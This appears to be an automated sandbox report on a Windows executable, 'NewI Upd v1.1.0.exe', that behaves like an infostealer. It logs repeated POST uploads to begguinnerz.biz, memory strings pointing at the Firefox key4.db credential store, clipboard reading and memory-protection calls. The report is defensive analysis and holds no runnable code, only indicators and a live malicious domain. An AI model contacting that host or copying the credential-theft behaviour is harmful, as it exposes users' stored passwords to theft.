Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KFE639LIZR1YG3YZ5JZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18176Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QUWCUNM037OXH2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8767Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6NPOTZ340UM1I91MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0VJUNPD5A8U7ORRNJ62User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1266Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SXIRRLO7FAIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1077Host: begguinnerz.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: begguinnerz.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: begguinnerz.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: begguinnerz.biz

Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000195F000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microX
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3080990005.00000000088C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/$
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/4
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/D
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179960747.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178564571.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/L
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059760478.0000000008899000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3080891177.00000000088A0000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3081146258.00000000088A0000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3080550430.000000000889D000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059691116.0000000008896000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3082316141.00000000088A4000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3080512137.0000000008896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/api
Source: NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.0000000001912000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.000000000190E000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3178938792.0000000001911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/apiz/
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3129801074.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/piT
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3157740815.000000000198A000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3143277934.000000000198A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz/pil
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/api
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apiOO
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apin.txtPK
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3178291506.00000000018F2000.00000004.00000020.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000002.3179704513.00000000018F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begguinnerz.biz:443/apis92o4p.default-release/key4.dbPK
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3059635151.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035426803.00000000088F1000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059726612.00000000088EA000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3059837353.00000000088EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3035485069.00000000088C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3034847918.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034913115.00000000088DC000.00000004.00000800.00020000.00000000.sdmp, NewI Upd v1.1.0.exe, 00000000.00000003.3034713193.00000000088DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: NewI Upd v1.1.0.exe, 00000000.00000003.3082057463.00000000089B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889

Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49914 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.4:49926 version: TLS 1.2

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_00433030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00433030

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Code function: 0_2_00433030 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

0_2_00433030

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_008C01A8 NtAllocateVirtualMemory,		0_2_008C01A8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_008C06E8 NtProtectVirtualMemory,NtProtectVirtualMemory,		0_2_008C06E8

Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00631010	0_2_00631010
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0063F160	0_2_0063F160
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00632920	0_2_00632920
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0063B180	0_2_0063B180
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00637500	0_2_00637500
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_006316D0	0_2_006316D0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00638720	0_2_00638720
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_008A37E0	0_2_008A37E0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0063A780	0_2_0063A780
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004388C0	0_2_004388C0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00423960	0_2_00423960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042D199	0_2_0042D199
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00427220	0_2_00427220
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043BB40	0_2_0043BB40
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043F340	0_2_0043F340
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004384A0	0_2_004384A0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043FCB0	0_2_0043FCB0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00408780	0_2_00408780
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040E7AD	0_2_0040E7AD
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043E820	0_2_0043E820
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00418030	0_2_00418030
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004370E8	0_2_004370E8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00409960	0_2_00409960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041C960	0_2_0041C960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043F960	0_2_0043F960
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00426970	0_2_00426970
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041F900	0_2_0041F900
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00411930	0_2_00411930
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041E130	0_2_0041E130
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043E9C0	0_2_0043E9C0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004039E0	0_2_004039E0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041D9E0	0_2_0041D9E0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004301EB	0_2_004301EB
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004059F0	0_2_004059F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004091F0	0_2_004091F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004149F0	0_2_004149F0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00419981	0_2_00419981
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042B190	0_2_0042B190
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040B1A0	0_2_0040B1A0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043C270	0_2_0043C270
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00431200	0_2_00431200
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041723C	0_2_0041723C
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004392C0	0_2_004392C0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043EAD0	0_2_0043EAD0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004062E0	0_2_004062E0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043EAEB	0_2_0043EAEB
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043EAE9	0_2_0043EAE9
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00425AFB	0_2_00425AFB
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004192AB	0_2_004192AB
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041835F	0_2_0041835F
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00422330	0_2_00422330
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004243CC	0_2_004243CC
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004123D0	0_2_004123D0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00402BE0	0_2_00402BE0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040F3E0	0_2_0040F3E0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00417BE8	0_2_00417BE8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040CBF2	0_2_0040CBF2
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00439B83	0_2_00439B83
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00404390	0_2_00404390
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043EC00	0_2_0043EC00
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040D410	0_2_0040D410
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00404CC0	0_2_00404CC0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_004094E0	0_2_004094E0
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00416490	0_2_00416490
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043EC90	0_2_0043EC90
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00427540	0_2_00427540
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00407550	0_2_00407550
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00437D50	0_2_00437D50
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040AD10	0_2_0040AD10
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041DD10	0_2_0041DD10
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00427520	0_2_00427520
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043ED30	0_2_0043ED30
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042D53A	0_2_0042D53A
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00426D90	0_2_00426D90
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0040E5A2	0_2_0040E5A2
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00422DA8	0_2_00422DA8
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00415E7F	0_2_00415E7F
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0043F600	0_2_0043F600
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042DE1E	0_2_0042DE1E
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042C6C1	0_2_0042C6C1
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00430EED	0_2_00430EED
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042DEA3	0_2_0042DEA3
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0041E750	0_2_0041E750
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00406770	0_2_00406770
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_0042C70E	0_2_0042C70E
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00422710	0_2_00422710
Source: C:\Users\user\Desktop\NewI Upd v1.1.0.exe	Code function: 0_2_00429723	0_2_00429723
